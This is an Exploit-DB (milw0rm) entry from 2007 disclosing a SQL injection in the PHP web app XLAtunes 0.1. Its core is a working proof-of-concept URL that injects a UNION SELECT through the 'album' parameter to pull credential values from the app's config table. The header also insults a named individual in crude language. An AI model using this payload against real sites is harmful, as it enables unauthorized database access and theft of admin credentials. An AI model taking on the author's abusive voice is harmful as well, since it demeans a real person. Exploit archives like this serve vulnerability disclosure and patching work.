XLAtunes 0.1 - 'album' SQL Injection

EDB-ID:

3327

Author:

Bl0od3r

Type:

webapps

Platform:

PHP

Published:

2007-02-17

#Critical Status:High
#Found By:Bl0od3r
#Download:http://www.scriptdungeon.com/script.php?ScriptID=2844
#Greetz:all my friends
#fuckz:Don(h4cky0u) for steeling hacks of others,for his 100% noobility,for his noobass.DON your an idiot.fucka. -
#confkey->Password
#confvalue->Username
#Table:config
#http://host.com/path/?mode=view&album=-1%20UNION%20SELECT%20confkey%20FROM%20config/*

# milw0rm.com [2007-02-17]